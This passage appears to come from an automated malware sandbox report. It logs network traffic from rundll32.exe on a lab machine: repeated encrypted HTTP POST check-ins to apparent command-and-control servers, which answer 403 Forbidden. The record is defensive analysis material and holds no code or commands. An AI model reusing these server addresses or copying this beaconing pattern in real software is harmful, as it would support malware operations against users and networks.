                                                                                                        Oct 28, 2021 05:03:48.551477909 CEST44349747192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:48.944669962 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.103060961 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.103348017 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.103426933 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.104022026 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.104201078 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.243176937 CEST44349747192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.243279934 CEST44349747192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.243498087 CEST49747443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:49.246109962 CEST49747443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:49.246145010 CEST44349747192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.262187958 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.262213945 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.262229919 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.262247086 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.436227083 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.604432106 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.604813099 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.607661963 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.645884037 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.645910978 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.648533106 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.659590960 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.775866032 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.778754950 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.778879881 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:49.817775011 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:49.916028976 CEST497516891192.168.2.345.77.0.96
                                                                                                        Oct 28, 2021 05:03:49.957117081 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:50.081513882 CEST68914975145.77.0.96192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.083161116 CEST497516891192.168.2.345.77.0.96
                                                                                                        Oct 28, 2021 05:03:50.084867954 CEST497516891192.168.2.345.77.0.96
                                                                                                        Oct 28, 2021 05:03:50.125045061 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.125720024 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.125865936 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:50.126894951 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:50.127036095 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:50.250164986 CEST68914975145.77.0.96192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.251272917 CEST68914975145.77.0.96192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.251367092 CEST497516891192.168.2.345.77.0.96
                                                                                                        Oct 28, 2021 05:03:50.294666052 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.294689894 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.294698000 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.294730902 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.294743061 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.499182940 CEST497516891192.168.2.345.77.0.96
                                                                                                        Oct 28, 2021 05:03:50.664971113 CEST68914975145.77.0.96192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.665124893 CEST497516891192.168.2.345.77.0.96
                                                                                                        Oct 28, 2021 05:03:50.665869951 CEST497516891192.168.2.345.77.0.96
                                                                                                        Oct 28, 2021 05:03:50.666009903 CEST497516891192.168.2.345.77.0.96
                                                                                                        Oct 28, 2021 05:03:50.679363012 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.679390907 CEST80849750143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.679527998 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:50.679568052 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:50.681910038 CEST49750808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:50.805602074 CEST497526891192.168.2.345.77.0.96
                                                                                                        Oct 28, 2021 05:03:50.831274033 CEST68914975145.77.0.96192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.831293106 CEST68914975145.77.0.96192.168.2.3
                                                                                                        Oct 28, 2021 05:03:50.849797010 CEST80849750143.244.140.214192.168.2.3

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • 192.46.210.220

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.349744192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:03:46 UTC0OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:03:46 UTC0OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:03:46 UTC4INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:03:46 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        1192.168.2.349747192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:03:48 UTC4OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:03:48 UTC5OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:03:49 UTC9INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:03:49 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        10192.168.2.349786192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:09 UTC49OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:09 UTC49OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:09 UTC54INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:09 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        11192.168.2.349788192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:09 UTC54OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:09 UTC54OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:10 UTC59INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:10 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        12192.168.2.349794192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:13 UTC59OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:13 UTC59OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:13 UTC64INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:13 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        13192.168.2.349796192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:13 UTC64OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:13 UTC64OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:14 UTC69INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:14 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        14192.168.2.349802192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:17 UTC69OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:17 UTC69OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:17 UTC73INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:17 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        15192.168.2.349804192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:17 UTC74OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:17 UTC74OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:18 UTC78INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:18 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        16192.168.2.349812192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:21 UTC79OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:21 UTC79OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:21 UTC88INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:21 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        17192.168.2.349814192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:21 UTC83OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:21 UTC83OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:22 UTC88INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:22 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        18192.168.2.349822192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:24 UTC88OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:24 UTC89OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
